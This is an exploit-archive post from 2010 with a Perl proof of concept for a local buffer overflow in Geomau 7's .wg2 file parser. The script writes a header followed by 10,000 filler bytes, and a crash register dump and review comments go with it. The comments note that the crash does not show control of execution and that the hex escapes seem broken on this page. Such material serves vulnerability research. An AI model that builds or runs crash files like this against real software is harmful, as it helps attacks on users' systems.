
geomau-overflow.txt

Posted on 26 June 2010

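###################################################################
#Exploit Title : Geomau 7 (.wg2) local Buffer Overflow Poc
#tested on windows xp SP 3 FR
#Author: MadjiX - Dz8[at]HotmaiL[dot]CoM
#download: http://math.exeter.edu/rparris/peanut/wgau32z.exe
#Special Greets:Bibi-info , His0k4 [ where are you :( ]
###################################################################
#EAX 0012F640
#ECX 00BB8F68
#EDX 00004789
#EBX 41414141
#ESP 0012F5F4
#EBP 0012F5F8
#ESI 00000032
#EDI 00000000
#EIP 0058AF23 wgeomau.0058AF23
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 0 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDF000(FFF)
#T 0 GS 0000 NULL
###################################################################
#
# Purpose: writes a test file named MadjiX.wg2 consisting of a fixed
# header string followed by a long run of filler, to reproduce the
# crash recorded in the register dump above.
#
# NOTE(review): in the dump, EBX holds 41414141, which matches the 0x41
# filler this script is meant to write, while EIP (0058AF23) still
# points inside the wgeomau module. The dump therefore documents a
# crash on file-supplied data, consistent with the "Poc" label; it does
# not show redirected execution.
#
# NOTE(review): the root cause is presumably a missing length check in
# the .wg2 parser. That code is not visible here; verify against the
# vendor's source or a fixed release before relying on this reading.

use strict;
use warnings;

# Name of the test file, created in the current working directory.
my $file = "MadjiX.wg2";

# Header portion of the test file.
# NOTE(review): as written on this page the literals below have no
# backslash before each "x", so Perl stores the ASCII text "x71x02..."
# rather than raw bytes. This looks like an extraction artifact of the
# page; confirm against the original advisory. The strings are kept
# exactly as shown.
my $hd = "x71x02x00x00x32x00x00x00x42x01x00x00x5Fx00x00x00x00x02x00x00x00x02x00x00"
       . "x00x00x00x00x01x00x00x00x3Dx00x00x00xD9xFFxFFxFFx2Cx01x00x00x64x00x00x00"
       . "x64x00x00x00x00x00x00x00x00x00x00x00x0Ax00x00x00x0Fx00x00x00x2BxD0x28x01"
       . "x49x1Ex29x01x00x00x00x00x0Cx00x00x00x0Ax00x00x00x0A";

# Filler appended after the header: the literal is repeated 10000 times.
my $junk = "x41" x 10000;

# Three-argument open with a lexical handle: the mode can never be
# taken from the file name, and the handle is not a package global.
# Every I/O step is checked so a failed write is reported instead of
# silently leaving a missing or truncated file.
open(my $out, '>', $file) or die "open $file: $!";
print {$out} $hd . $junk  or die "write $file: $!";
close($out)               or die "close $file: $!";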

 
